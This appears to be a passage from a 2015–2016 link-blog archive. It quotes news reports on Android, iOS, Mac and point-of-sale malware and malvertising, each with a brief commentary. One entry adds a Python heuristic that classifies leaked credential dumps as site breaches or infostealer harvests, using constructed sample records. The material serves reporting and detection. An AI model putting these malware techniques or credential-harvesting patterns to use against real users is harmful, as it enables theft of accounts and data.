She managed to fix it (pretty much) but as she points out, if even knowledgeable people are struggling with this, what hope for those who just buy a smart lightbulb or smart thermostat or smart whatever and assume that's the end of the story? We're building up trouble.
Iot  hacking  malware 
december 2016 by charlesarthur
More than 1 million Google accounts breached by Gooligan malware • Check Point Technologies
<p>The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device. Our research team has found infected apps on third-party app stores, but they could also be downloaded by Android users directly by tapping malicious links in phishing attack messages.

<img src="http://blog.checkpoint.com/wp-content/uploads/2016/11/info_4_REVISED_11.23.16.jpg" width="100%" />

After an infected app is installed, it sends data about the device to the campaign’s Command and Control (C&C) server.

Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153). These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user. If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely.

After achieving root access, Gooligan downloads a new, malicious module from the C&C server and installs it on the infected device. This module injects code into running Google Play or GMS (Google Mobile Services) to mimic user behavior so Gooligan can avoid detection, a technique first seen with the mobile malware HummingBad. The module allows Gooligan to:

• Steal a user’s Google email account and authentication token information
• Install apps from Google Play and rate them to raise their reputation
• Install adware to generate revenue

Ad servers, which don’t know whether an app using its service is malicious or not, send Gooligan the names of the apps to download from Google Play. After an app is installed, the ad service pays the attacker. Then the malware leaves a positive review and a high rating on Google Play using content it receives from the C&C server.</p>

Affects Android 4 and 5, which covers 74% of users. Most of those affected are in Asia, but about 120,000 in Europe. Remember the thing I said the other day about Android vulnerabilities being theoretical, until they aren't? This is that.
Android  malware  hacking  gooligan 
november 2016 by charlesarthur
Spotify has been sending computer viruses to listeners • Daily Telegraph
James Titcomb:
<p>Spotify has been found to be serving malware to listeners who use the free version of its service, with its adverts directing PC users to virus-riddled websites.

<a href="https://community.spotify.com/t5/Ongoing-Issues/Spotify-Free-ads-causes-browser-to-launch-on-malware-virus/idi-p/1461222">Users of the music streaming software reported</a> that the program would continually open their default web browser to load websites infested with malware.

The issue affected users of Windows, Mac and Linux operating systems, leading to complaints on the Spotify Community website and Twitter. The malware websites, some of which attempt to install viruses automatically without the user clicking anything, appear to have nothing to do with the advert in question.

The problem appears to be associated with a single advert on Spotify, which the company said it had removed after discovering the problem.</p>


Collateral damage of the advertising-funded method. If advertising is roughly 2% of US GDP, what percentage is malvertising?
spotify  malware 
october 2016 by charlesarthur
Malware in Transmission client • Transmission
<p>Q. What happened?

A. It appears that on or about August 28, 2016, unauthorized access was gained to our website server. The official Mac version of Transmission 2.92 was replaced with an unauthorized version that contained the OSX/Keydnap malware. The infected file was available for download somewhere between a few hours and less than a day. Additional information about the malware is available <a href="http://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/">here</a> and <a href="http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/">here</a>.</p>


Keydnap steals credentials from the OSX keychain (where system and personal passwords live). Yes, there is a certain irony in a Bittorrent client being subverted like this.
malware  mac 
september 2016 by charlesarthur
Breaking News 1: How monetizing became malvertising • Reynolds Journalism Institute
Barrett Golding:
<p>Bromium Labs found <a href="https://www.bromium.com/company/press-releases/bromium-threat-report-identifies-security-risks-popular-websites-and-software.html">more than half the ads with malware payloads were on either news or entertainment websites</a>, with news at the top of the pack (32 percent). Like all marketers, malvertisers want premiere placement on well-respected sites. The ad-bidding process grants them their wish.

In March 2016 the websites of The New York Times, BBC, Weather Network, The Hill, Newsweek, AOL, MSN, and NFL all, as CNET reported, “<a href="http://www.cnet.com/news/new-york-times-bbc-dangerous-ads-ransomware-malvertising/">inadvertently ran malicious ads that attempted to hijack the computers of visitors and demand a ransom</a>.”

This even juicier website-breaking news is from Engadget: “Forbes asked readers to turn off ad blockers in order to view the article. After doing so, visitors were immediately served with pop-under malware, primed to infect their computers, and likely silently steal passwords, personal data and banking information.”

<img src="https://www.rjionline.org/images/posts/Bromium-Malvertisement-attack-sources.png" width="100%" />
<em>Malicious advertisements sources, Bromium Labs</em>

The problem is not new. It’s been happening on news sites for years. These headlines are from 2013:

“<a href="http://www.adweek.com/news/technology/amount-questionable-online-traffic-will-blow-your-mind-153083">The Amount of Questionable Online Traffic Will Blow Your Mind: The World Wide rip-off</a>” - Adweek.
“<a href="http://adcontrarian.blogspot.co.il/2013/06/the-75-billion-ad-swindle.html">The $7.5 Billion Ad Swindle</a>” - The Ad Contrarian.
Google has <a href="http://www.anti-malvertising.com/">run an anti-malvertising team since 2009</a>. Here’s a recent report on their progress:
<p>Google is enabling traffic laundering, where websites with pirated content redirect visitors to shell websites displaying AdSense ads. These ads finance piracy, and Google is taking a cut in the process. Google clients have no clue of the reputational risk they run by using AdSense.
—“<a href="https://kalkis-research.com/real-life-example-google-implication-ad-fraud-traffic-laundering">A Real Life Example of Google’s Implication in Ad Fraud and Traffic Laundering,” Kalkis Research</a></p>


CNBC and CNN commentator Shelly Palmer wrote, “Ad tech has evolved into a toxic ecosystem that is killing itself, and it is taking digital advertising with it.” His article, “<a href="http://www.shellypalmer.com/2016/06/well-ad-tech-dies/">What We’ll Do When Ad Tech Dies</a>,” concludes, “Ad tech will be with us in its current form until someone goes to jail.”</p>


Why is it that news sites are so particularly targeted? Because they take a ton more ad-tech ads? (Via Rob Leathern.)
advertising  malware 
august 2016 by charlesarthur
WikiLeaks released a cache of malware in its latest email dump • Engadget
Andrew Dalton:
<p>In its rush to let information be free, WikiLeaks has released over 80 different malware variants while publishing its latest collection of emails from Turkey's ruling AKP political party. In a <a href="https://github.com/bontchev/wlscrape/blob/master/malware.md">Github post</a>, security expert Vesselin Bontchev has laid out many of the instances of malicious links, most of which came from "run-of-the-mill" spam and phishing emails found in the dump. While WikiLeaks has claimed the emails shed light on corruption within the Turkish government, New York Times reporter Zeynep Tufekci has pointed out that the materials have little to do with Turkish politics and mostly appear to be mailing lists and spam.</p>


"In its rush to let information be free", or perhaps "With disregard for innocent people who would be affected".
malware  wikileaks 
august 2016 by charlesarthur
Malware in the browser: how you might get hacked by a Chrome extension • Kjaer
Maxime Kjaer:
<p>On my Facebook news feed, I had noticed that one of my friends was regularly liking some weird, lewd, clickbaity links. Now clickbait content is far from uncommon on Facebook, but something was off in this case. I had noticed a pattern: it was always the same friend who would Like the same type of links. They would always have around 900 Likes and no comments, while the page behind them has about 30 Likes. Even weirder: every single post on that page is posted 25 times.

<img src="https://kjaer.io/images/chrome-malware/liked-post.png" width="100%" />
<em>One of the posts that my friend had Liked. 940 Likes, no comments.</em>

Now I know my friend; he’s a smart guy, so I don’t really see him liking tons of this (frankly) crap content. Intrigued, I decided to go down the rabbit hole and see what this was all about.

So I clicked on one of these links. Huge mistake.

I was instantly greeted with a message saying that I should verify my age before I could view the content. The semi-raunchy nature of the content made it seem sort of justified. What wasn’t justified, though, was the fact that this verification had to be done by installing a Chrome extension.</p>


Of course your spidey sense is tingling. But as you read through you'll be saying "Whaaaa..?" The suggested moral: Google ought to vet the makers of Chrome extensions or manually verify them.

Not sure that's going to happen in a hurry. However it is a new avenue of infection: Kjaer found 160,000 PCs infected with this malware.
chrome  javascript  malware  security 
july 2016 by charlesarthur
HummingBad malware puts 10 million Android devices at risk • SlashGear
JC Torres:
<p>According to Check Point, as many as 10m devices around the globe have infected apps installed on their Android smartphone or tablet. Unsurprisingly, the majority of those come from China, India, and the usual Asian countries, but the US isn't clean of it either.

<img src="http://cdn.slashgear.com/wp-content/uploads/2016/07/hummingbad-2.jpg" alt="hummingbad-2" width="100%" />

At the moment, however, HummingBad isn't doing maximum damage. It does attempt to root devices in order to further spread its malware, install more infected apps, and whatnot. Failing to do that, it has fallback measures to gain access. All of these are being done in the name of generating ad revenue. However, considering it tries to gain root access, its actual potential is far more frightening. That said, based on Check Point's own data, older Android devices are more prone to getting infected, with Android 5.0 Lollipop and Android 6.0 Marshmallow showing the smallest shares.

<img src="http://cdn.slashgear.com/wp-content/uploads/2016/07/hummingbad-3.jpg" alt="hummingbad-3" width="100%" />

However, it is the narrative around HummingBad that is actually more worrying. Check Point traced the malware to a Chinese entity named YingMob, which turned out to be a mobile ad server company. In a nutshell, it is actually a legit company partnering with other legit companies to serve ads. Most malware groups turn to hide underground, but YingMob operates out in the open, though the group behind HummingBad is just one part of the company.</p>

Usually Android malware is restricted to China; this is unusual and worrying.
malware  android 
july 2016 by charlesarthur
Godless mobile malware can root 90% of Android devices
<p>The mobile malware masquerades as harmless-looking mobile apps, including this Summer Flashlight app:

<img src="https://cdn.grahamcluley.com/wp-content/uploads/2016/06/godless-app.png" width="100%" />

Several clean apps on Google Play also share the same developer certificate with malicious versions containing the Godless code. This means there is the potential for a user to be upgraded to a malicious version of an app without their knowledge.

If and when that infection occurs, Godless won't lock their screen and demand hundreds of dollars in ransom. Neither will it place calls to mysterious Chinese phone numbers. Instead it will have the ability to download any app it chooses, including those that spam users with ads and/or install backdoors onto an infected device.</p>


More details on the <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/godless-mobile-malware-uses-multiple-exploits-root-devices/">Trend Micro blog post</a>. It starts installing when the screen switches off - sneaky.
malware  android 
june 2016 by charlesarthur
Slicing into a point-of-sale botnet • Krebs on Security
Brian Krebs:
<p>Over the weekend, I heard from a source who said that since November 2015 he’s been tracking a collection of hacked cash registers. This point-of-sale botnet currently includes more than 100 infected systems, and according to the administrative panel for this crime machine at least half of the compromised systems are running a malicious Microsoft Windows process called cicipos.exe.

The admin panel shows the Internet address of a number of infected point-of-sale devices as of June 4, 2016. Many of these appear to be at Cici’s Pizza locations.

KrebsOnSecurity has not been able to conclusively tie the botnet to CiCi’s. Neither CiCi’s nor its outside public relations firm have responded to multiple requests for comment. However, the control panel for this botnet includes the full credit card number and name attached to the card, and several individuals whose names appeared in the botnet control panel confirmed having eaten at CiCi’s Pizza locations on the same date that their credit card data was siphoned by this botnet.

Among those was Richard Higgins of Prattville, Ala., whose card data was recorded in the botnet logs on June 4, 2016. Reached via phone, Higgins confirmed that he used his debit card to pay for a meal he and his family enjoyed at a CiCi’s location in Prattville on that same date.</p>


Of course, if they used chip/PIN.. then probably the PINs would get stolen too. 🤔
security  pos  malware 
june 2016 by charlesarthur
Analysis of Twitter.com password leak • LeakedSource
<p>This data set contains 32,888,300 records. Each record may contain an email address, a username, sometimes a second email and a visible password. We have very strong evidence that Twitter was not hacked, rather the consumer was. These credentials however are real and valid. Out of 15 users we asked, all 15 verified their passwords.

The explanation for this is that tens of millions of people have become infected by malware, and the malware sent every saved username and password from browsers like Chrome and Firefox back to the hackers from all websites including Twitter.

The proof for this explanation is as follows:

• The join dates of some users with uncrackable (yet plaintext) passwords were recent. There is no way that Twitter stores passwords in plaintext in 2014 for example.
• There was a very significant amount of users with the password "<blank>" and "null". Some browsers store passwords as "<blank>" if you don't enter a password when you save your credentials.
• The top email domains don't match up to a full database leak; more likely the malware was spread to Russians.</p>


Websites <em>including</em> Twitter. That's worrying. There's also a list of the passwords used. Guess which six-character one comes top?
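The three indicators LeakedSource lists (plaintext passwords on recently created accounts, "&lt;blank&gt;"/"null" placeholder passwords that browsers store, and an email-domain mix that does not look like a whole-site dump) are a reusable triage method for deciding whether a credential set came from a site breach or from infostealer malware on users' machines. The block below is an added example written for this page, not LeakedSource's tooling; the records are constructed inline, the hash-shape patterns and the cut-offs (join year 2014, a 50% plaintext share, a 40% top-domain share) are assumptions you would adjust for the site in question.

```python
"""Triage a leaked credential set: site breach or browser-harvested by malware? (added example)"""
import re
from collections import Counter

# Strings that look like stored password hashes rather than plaintext
# (hex MD5/SHA-1/SHA-256, bcrypt, or crypt(3)-style "$id$salt$hash"). Assumed patterns.
HASH_LIKE = re.compile(
    r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}|\$2[aby]\$\d\d\$.{53}|\$[a-z0-9]+\$.+)$",
    re.I,
)

# Values browsers write when a user saves a login without typing a password.
PLACEHOLDER_PASSWORDS = {"", "<blank>", "null", "NULL"}


def looks_hashed(password):
    return bool(HASH_LIKE.match(password))


def triage(records, plaintext_since=2014, top_n=3):
    """Score the three indicators and return them with a verdict.

    records: dicts with keys email, username, password, join_year.
    """
    n = len(records)
    recent = [r for r in records if r["join_year"] >= plaintext_since]
    recent_plaintext = [
        r for r in recent
        if not looks_hashed(r["password"]) and r["password"] not in PLACEHOLDER_PASSWORDS
    ]
    placeholder_count = sum(1 for r in records if r["password"] in PLACEHOLDER_PASSWORDS)
    hashed_count = sum(1 for r in records if looks_hashed(r["password"]))
    domains = Counter(r["email"].rsplit("@", 1)[-1].lower() for r in records if "@" in r["email"])
    top_domains = domains.most_common(top_n)

    recent_plaintext_share = len(recent_plaintext) / len(recent) if recent else 0.0
    placeholder_share = placeholder_count / n if n else 0.0
    top_domain_share = top_domains[0][1] / n if top_domains and n else 0.0

    indicators = {
        "recent_accounts_have_plaintext_passwords": recent_plaintext_share >= 0.5,
        "browser_placeholder_passwords_present": placeholder_share >= 0.01,
        "email_domains_concentrated": top_domain_share >= 0.4,
    }
    # Two or more indicators point at credentials harvested from victims' browsers;
    # a real breach of a modern site would mostly yield hashes, not plaintext.
    verdict = "infostealer" if sum(indicators.values()) >= 2 else "site-breach-or-unknown"
    return {
        "records": n,
        "recent_plaintext_share": recent_plaintext_share,
        "placeholder_count": placeholder_count,
        "hashed_count": hashed_count,
        "top_domains": top_domains,
        "indicators": indicators,
        "verdict": verdict,
    }


# Constructed sample records (not real accounts).
SAMPLE_RECORDS = [
    {"email": "a@mail.ru", "username": "a", "password": "Xk9$vLq2!pRw", "join_year": 2015},
    {"email": "b@mail.ru", "username": "b", "password": "<blank>", "join_year": 2013},
    {"email": "c@yandex.ru", "username": "c", "password": "null", "join_year": 2016},
    {"email": "d@mail.ru", "username": "d", "password": "qwerty123", "join_year": 2012},
    {"email": "e@gmail.com", "username": "e", "password": "T7#hGz1m", "join_year": 2015},
    {"email": "f@rambler.ru", "username": "f", "password": "123456", "join_year": 2011},
    {"email": "g@mail.ru", "username": "g", "password": "8f14e45fceea167a5a36dedd4bea2543", "join_year": 2010},
    {"email": "h@yandex.ru", "username": "h", "password": "password", "join_year": 2014},
]

if __name__ == "__main__":
    print(triage(SAMPLE_RECORDS))
```

The same heuristics drive the response: an infostealer verdict means the affected users' other saved logins are exposed too, so the advice is to clean the endpoint and rotate every browser-saved password, not only the one for the site named in the dump.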
twitter  password  malware  browser  hack 
june 2016 by charlesarthur
190 Android apps infected with malware discovered on the Google Play Store • Softpedia
Catalin Cimpanu:
<p>Researchers spotted the malware-infected apps towards the end of April, but only recently have these apps been removed. The Russian security firm says the apps contained a version of the malware identified as Android.Click.95.

According to <a href="http://vms.drweb.com/virus/?_is=1&i=8058237">their analysis</a> of the malware's mode of operation, Android.Click waits for six hours after the user installs it as part of an infected app.

After the six hours pass, the malware forcibly loads a URL in the user's browser, which contains scareware-like messages that tell the user his system or his battery has problems.

To fix his issues, the user has to download another app. In the cases they've observed, Dr.Web researchers say the malware redirected users back to the Google Play Store to download these second-stage apps.

"For each download, fraudsters receive interest under the terms of affiliate advertising agreements," Dr.Web researchers explained. "It explains why Android.Click.95 is so much widespread—the cybercriminals try to make as much profit as they can from these downloads."</p>


To be precise, "Android.Click.95 opens the fraudulent website every 2 minutes from the moment when it has started functioning, making it irritating to use the infected device. At that, the maximum number of visits of the fraudulent website is limited to 1000 times." Seems to be Russian apps (judging from the analysis) but likely to spread.
android  malware 
may 2016 by charlesarthur
Dental Assn mails malware to members » Krebs on Security
Brian Krebs:
<p>The American Dental Association (ADA) says it may have inadvertently mailed malware-laced USB thumb drives to thousands of dental offices nationwide.

The problem first came to light in a <a href="http://www.dslreports.com/forum/r30717075-ADA-just-sent-me-a-surprise">post</a> on the DSL Reports Security Forum. DSLR member “Mike” from Pittsburgh got curious about the integrity of a USB drive that the ADA mailed to members to share updated “dental procedure codes” — codes that dental offices use to track procedures for billing and insurance purposes…</p>


It had a launcher which would take a PC to a site which would try to download malware; and few antivirus checkers would find it.
<p>In response to questions from this author, the ADA said the USB media was manufactured in China by a subcontractor of an ADA vendor, and that some 37,000 of the devices have been distributed. The not-for-profit ADA is the nation’s largest dental association, with more than 159,000 members.

“Upon investigation, the ADA concluded that only a small percentage of the manufactured USB devices were infected,” the organization wrote in an emailed statement.</p>


One should now routinely assume that anything involving (a) Flash (b) USB drives is potentially a malware route. Fortunately, both are avoidable in normal life.
dentist  malware 
may 2016 by charlesarthur
Met police chief blaming the victims » Light Blue Touchpaper
Ross Anderson, professor of security engineering at the University of Cambridge, wrote a letter to The Times:
<p>[Met Police commissioner] Sir Bernard Hogan-Howe <a href="http://www.theguardian.com/uk-news/2016/mar/24/dont-refund-online-victims-met-chief-tells-banks">argues that banks should not refund online fraud victims</a> as this would make people careless with their passwords and anti-virus software (p1, March 24, and letters Mar 25 & 26). This is called secondary victimisation. Thirty years ago, a chief constable might have said that rape victims had themselves to blame for wearing nice clothes; if he were to say that nowadays, he’d be sacked. Hogan-Howe’s view of bank fraud is just as uninformed, and just as offensive to victims.

About 5 percent of computers running Windows are infected with malware, and common bank fraud malware such as Zeus lets the fraudster redirect transactions. You think you’re paying £150 to your electricity bill, while the malware is actually sending £9000 to Russia. The average person is helpless against this; everything seems normal, and antivirus products usually only detect it afterwards.

Much of the blame lies with the banks, who let the users of potentially infected computers make large payments instantly, rather than after a day or two, as used to be the case. They take this risk because regulators let them dump much of the cost of the resulting fraud on customers.</p>


Hogan-Howe really put his foot in it, but it's the inertia that he represents - and the attempt to shift the blame - which is the most insidious.
crime  cyber  malware 
march 2016 by charlesarthur
AceDeceiver: first iOS trojan exploiting Apple DRM design flaws to infect any iOS device » Palo Alto Networks
Claud Xiao:
<p>We’ve discovered a new family of iOS malware that successfully infected non-jailbroken devices we’ve named “AceDeceiver”.

What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel attack vector…


…To carry out the attack, the [malware] author created a Windows client called ”爱思助手 (Aisi Helper)” to perform the FairPlay MITM attack. Aisi Helper purports to be software that provides services for iOS devices such as system re-installation, jailbreaking, system backup, device management and system cleaning. But what it’s also doing is surreptitiously installing the malicious apps on any iOS device that is connected to the PC on which Aisi Helper is installed. (Of note, only the most recent app is installed on the iOS device(s) at the time of infection, not all three at the same time.) These malicious iOS apps provide a connection to a third-party app store controlled by the author for users to download iOS apps or games. It encourages users to input their Apple IDs and passwords for more features, and, once provided, these credentials will be uploaded to AceDeceiver’s C2 server after being encrypted. We also identified some earlier versions of AceDeceiver that had enterprise certificates dated March 2015.

As of this writing, it looks as though AceDeceiver only affects users in mainland China.</p>


So it's really a Windows infection?
apple  ios  malware 
march 2016 by charlesarthur
275 million Android phones imperiled by new code-execution exploit » Ars Technica UK
Dan Goodin:
<p>The NorthBit-developed attack exploits a Stagefright vulnerability discovered and disclosed last year by Zimperium, the security firm that first demonstrated the severe weaknesses in the code library. For reasons that aren't yet clear, Google didn't fix the vulnerability in some versions, even though the company eventually issued a patch for a different bug that had made the Zimperium exploits possible. While the newer attack is in many ways a rehash of the Zimperium work, it's able to exploit an information leak vulnerability in a novel way that makes code execution much more reliable in newer Android releases. Starting with version 4.1, Android was fortified with an anti-exploitation defense known as address space layout randomization, which loads downloaded code into unpredictable memory regions to make it harder for attackers to execute malicious payloads. The breakthrough of Metaphor is its improved ability to bypass it.

"They've proven that it's possible to use an information leak to bypass ASLR," Joshua Drake, Zimperium's vice president for platform research and exploitation, told Ars. "Whereas all my exploits were exploiting it with a brute force, theirs isn't making a blind guess. Theirs actually leaks address info from the media server that will allow them to craft an exploit for whoever is using the device."</p>


Affects versions 2.2 through to 4.0, and 5.0 and 5.1. Which is 41.1% of phones, according to latest data from Google. Would have thought that is more than 275m, actually.
android  stagefright  malware 
march 2016 by charlesarthur
Crypto-ransomware spreads via poisoned ads on major websites » Tripwire
Graham Cluley:
<p>Some of the world’s most popular news and entertainment websites have been spreading poisoned adverts to potentially hundreds of thousands of visitors, putting innocent readers at risk of having their computers hit by threats such as ransomware.

Famous sites which displayed the malicious ads and endangered visiting computers include MSN, bbc.com, the New York Times, AOL and Newsweek.

As a result, researchers at Malwarebytes say that they saw a “huge spike in malicious activity” over the weekend.

Security analysts at TrendLabs and Malwarebytes report that the attack is one of the largest ransomware campaigns seen in years, taking advantage of a recently-updated version of the notorious Angler Exploit Kit to spread malware.

Just last month the Angler Exploit Kit was found to be targeting PCs and Macs after it was updated to take advantage of a known vulnerability in Microsoft Silverlight…

…It seems glaringly apparent to me that there is so much malicious advertising on the internet that anytime you surf even legitimate sites without an ad blocker in place, you are putting your computer’s data at risk.</p>
adblocking  malware  ransomware 
march 2016 by charlesarthur
Invisible porn-clicking trojans invade Android's Google Play store » Tripwire
Graham Cluley:
<p>many bogus versions of a wide range of apps (ranging from Toy Truck Rally to Subway Surfers 2 to GTA San Andreas and Tinder) have been distributed by fraudsters who wish to use your bandwidth to earn themselves affiliate income by clicking on adverts for pornographic websites.

Of course, if the apps popped up a copy of the Chrome browser to click on the X-rated ads then chances are that you would notice something unusual was afoot. Criminals have learnt from experience that announcing their presence so obviously only hinders their money-making plans.

So, in the case of “<a href="http://www.welivesecurity.com/2016/02/24/porn-clicker-trojans-google-play-analysis/">Porn Clicker</a>”, the apps spin up an invisible browser window – meaning that any ad-clicking is invisible to the naked eye. And then, a minute or so later, it clicks again.

The money soon begins to earn cash for the criminals – which is a truth especially evident when you consider that some of the bogus apps have been downloaded thousands of times.</p>


Android is following exactly the same malware growth path as Windows did on the desktop.
android  malware 
february 2016 by charlesarthur
Pirated App Store client for iOS found on Apple's App Store » HelpNet Security
Zeljka Zorz:
<p>The app hasn’t been flagged as potentially dangerous by Apple’s strict code reviewers, most likely because the app was made to look like a simple app for learning English if a reviewer (or user) accessed the app from anywhere outside China, and showed its true face only for those located in China.

Also, it’s coded in the Lua programming language, and this allows the developers to update the app remotely and repeatedly without triggering Apple’s app review process.

The app was available for download in the App Store for over three and a half months (since October 30, 2015 to the end of last week), but has now been removed.

The researchers haven’t discovered any actual malicious functionality in the app, but given its capabilities, it should definitely be considered risky to use. They dubbed it ZergHelper, and discovered over 50 enterprise-signed versions of the app being distributed in the wild through alternative channels.</p>


Enterprise certificates are still the biggest weak point for getting apps onto iPhones. This one was clever too in using geolocation, and Lua.
apple  malware 
february 2016 by charlesarthur
Android malware spread via porn websites to generate fake ad revenue » Grahamcluley.com
David Bisson:
<p>Researchers have spotted a new type of mobile malware that roots Android devices with the purpose of generating fraudulent ad revenue for its operator.

Earlier this month, Andrey Polkovnichenko and Oren Koriat, two members of the Check Point Research Team, <a href="http://blog.checkpoint.com/2016/02/04/hummingbad-a-persistent-mobile-chain-attack/">wrote in a blog post</a> about how they detected the malware, which they have named "HummingBad," as part of a drive-by download attack served by porn websites against two customers' Android devices.

Curious, they decided to dig into the malware and figure out what makes it tick.

As it turns out, HummingBad is a complex rootkit whose components are encrypted, in an attempt to avoid being flagged by security solutions as malicious.</p>
android  malware  advertising 
february 2016 by charlesarthur
Cyber sacrilege at Christmas: Android malware hiding in Bible (and Quran) apps » Forbes
Thomas Fox-Brewster:
<p>Security company Proofpoint isn’t revealing which exact Android apps are doing bad deeds, as it is going through the process of disclosure with the affected developers and vendors. It is instead revealing data on the number of malware or aggressive adware targeting the Google operating system. Proofpoint analyzed over 5,600 unique Bible apps (4,154 for Android and 1,500 for Apple's iOS), including 208 that contained known malicious code and 140 that were classified as “high risk” based on their behavior, all for the Android platform. Apple is evidently doing a good job of keeping out dangerous Bibles.

Kevin Epstein, VP of threat operations at Proofpoint, said those apps with known malicious behavior let attackers steal information from mobile devices, exploit zero-day vulnerabilities, possibly jailbreak or “root” a device, pilfer login credentials and communicate with IP addresses previously linked with rogue activity.</p>


How is it that Apple is keeping out the dangerous ones, though? You'd assume it would be targeted just the same.
android  bible  malware 
december 2015 by charlesarthur
Reader’s Digest and other WordPress sites compromised to push Angler EK » Malwarebytes Unpacked
Jérôme Segura:
<p>We’re seeing another uptick in WordPress compromises, using a slightly different modus operandi than the EITest campaign we recently blogged about, being responsible for a large number of infections via the Angler exploit kit.

The attack consists of a malicious script injected within compromised WordPress sites that launches another URL whose final purpose is to load the Angler exploit kit. Site owners that have been affected should keep in mind that those injected scripts/URLs will vary over time, although they are all using the same pattern (see IOCs below for some examples).

The website of popular magazine Reader’s Digest is one of the victims of this campaign and people who have visited the portal recently should make sure they have not been infected. The payload we observed at the time of capture was Bedep which loaded Necurs a backdoor Trojan, but that of course can change from day to day.</p>


Solution: don't read sites on desktop? (Thanks Ivan Ivanovich.)
wordpress  malware 
november 2015 by charlesarthur